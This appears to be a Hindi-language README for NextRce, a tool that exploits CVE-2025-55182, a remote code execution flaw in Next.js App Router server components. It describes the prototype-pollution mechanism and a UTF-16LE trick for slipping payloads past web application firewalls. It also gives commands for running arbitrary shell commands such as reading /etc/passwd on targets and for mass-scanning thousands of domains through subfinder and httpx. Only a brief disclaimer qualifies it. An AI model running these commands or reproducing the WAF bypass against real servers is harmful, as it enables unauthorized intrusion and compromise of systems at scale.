
React Shell और Next.js RSC शोषण उपकरण (CVE-2025-55182)
child_process या execSync जैसे कीवर्ड वाले मानक पेलोड अक्सर Web Application Firewalls (WAFs) द्वारा अवरुद्ध कर दिए जाते हैं।
NextRCSWaff.py एक विशेष UTF-16LE (लिटिल एंडियन) एन्कोडिंग इंजन का उपयोग करता है। इस विशिष्ट प्रारूप में दुर्भावनापूर्ण पेलोड को एन्कोड करके, बाइट अनुक्रम पूरी तरह से बदल जाता है, जिससे यह अधिकांश सिग्नेचर-आधारित WAFs के लिए अदृश्य हो जाता है। हालांकि, Next.js (Node.js) सर्वर सही ढंग से कमांड को डिकोड और निष्पादित करता है।
प्रूफ ऑफ कॉन्सेप्ट: उपरोक्त स्क्रीनशॉट एक मानक पेलोड के अवरुद्ध होने (ऊपर) और फिर --bypass फ्लैग के साथ NextRCSWaff.py का उपयोग करके सफल RCE निष्पादन (नीचे) को प्रदर्शित करता है।
NextRce एक उच्च-प्रदर्शन, मल्टीथ्रेडेड सुरक्षा उपकरण है जिसे CVE-2025-55182 का पता लगाने और उसका शोषण करने के लिए डिज़ाइन किया गया है। यह विशेष रूप से Next.js App Router आर्किटेक्चर के भीतर React Server Components (RSC) कार्यान्वयन को लक्षित करता है। सर्वर एक्शन में सीरियलाइज़ेशन प्रक्रिया में हेरफेर करके, NextRce एक तैयार पेलोड इंजेक्ट करता है ताकि कमजोर इंस्टेंस पर Remote Code Execution (RCE) प्राप्त हो सके। इसमें एक स्मार्ट डिटेक्शन इंजन है जो स्वचालित रूप से कमजोर App Router आर्किटेक्चर और सुरक्षित लीगेसी Pages Routers के बीच अंतर करता है, जिससे बड़े पैमाने पर स्कैन के दौरान दक्षता सुनिश्चित होती है।
window.__next_f की खोज करके) ताकि कमजोर App Router लक्ष्यों और लीगेसी Pages Router साइटों की पहचान की जा सके।stdin पाइपिंग को पूरी तरह से सपोर्ट करता है। subfinder, httpx, और gau जैसे रिकॉनिसेंस टूल्स के साथ सहजता से एकीकृत होता है।ThreadPoolExecutor न्यूनतम संसाधन ओवरहेड के साथ एक साथ हजारों डोमेन को स्कैन करने की अनुमति देता है।Next.js App Router React Server Components (RSC) के लिए एक कस्टम सीरियलाइज़ेशन प्रारूप का उपयोग करता है। भेद्यता Next-Action हेडर के डिसीरियलाइज़ेशन लॉजिक में मौजूद है। जब एक विशेष रूप से तैयार ऑब्जेक्ट (__proto__ को दूषित करते हुए) एक सर्वर एक्शन एंडपॉइंट (जैसे, /adfa) पर भेजा जाता है, तो आंतरिक पार्सर को child_process के माध्यम से मनमाना Node.js कोड निष्पादित करने के लिए मजबूर किया जा सकता है।
X-Powered-By: Next.js हेडर और विशिष्ट पथ संरचनाओं (/_next/) की जांच करने के लिए एक हानिरहित प्रोब भेजता है।window.__next_f -> कमजोर (App Router)__NEXT_DATA__ -> सुरक्षित (Pages Router)execSync(cmd) चलाने के लिए मजबूर करता है। stdout को base64 एन्कोड किया जाता है और सर्वर की त्रुटि प्रतिक्रिया के digest फ़ील्ड में वापस किया जाता है, जिसे NextRce डीकोड करके प्रदर्शित करता है।# Clone the repository
git clone [https://github.com/ynsmroztas/NextRce.git](https://github.com/ynsmroztas/NextRce.git)
# Navigate to the directory
cd NextRce
# Install dependencies
pip install requests
python3 NextRCSWaff.py -u https://target.com) -c "whoami" --bypass
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 nextrce.py -c "id" -t 50
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 NextRCSWaff.py -c "id" -B
python3 nextrce.py -u https://vulnerable.target.com -c "cat /etc/passwd"
python3 nextrce.py -l targets.txt -c "whoami" -t 100
python3 nextrce.py -u https://target.com -p http://127.0.0.1:8080
Flag,Description,Default "-u, --url",स्कैन करने के लिए एकल लक्ष्य URL,None "-l, --list",URL सूची वाली फ़ाइल का पथ,None "-c, --cmd",सर्वर पर निष्पादित करने का कमांड,id "-t, --threads",समवर्ती थ्रेड्स की संख्या,30 "-p, --proxy","HTTP प्रॉक्सी URL (जैसे, http://127.0.0.1:8080)",None "-v, --verbose",वर्बोज़ आउटपुट सक्षम करें (असफल प्रयास दिखाएं),False "-B, --bypass",(केवल NextRCSWaff.py) WAFs को बायपास करने के लिए UTF-16LE एन्कोडिंग सक्षम करें,False
यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए विकसित किया गया है। लेखक (Mitsec) इस उपकरण के कारण होने वाले किसी भी अवैध उपयोग, क्षति, या अनधिकृत पहुंच के लिए जिम्मेदार नहीं है। कोई भी सुरक्षा परीक्षण करने से पहले हमेशा सिस्टम स्वामी से स्पष्ट अनुमति प्राप्त करें।
NextRce को Mitsec द्वारा विकसित और अनुरक्षित किया जाता है।
Twitter/X: @ynsmroztas
GitHub: ynsmroztas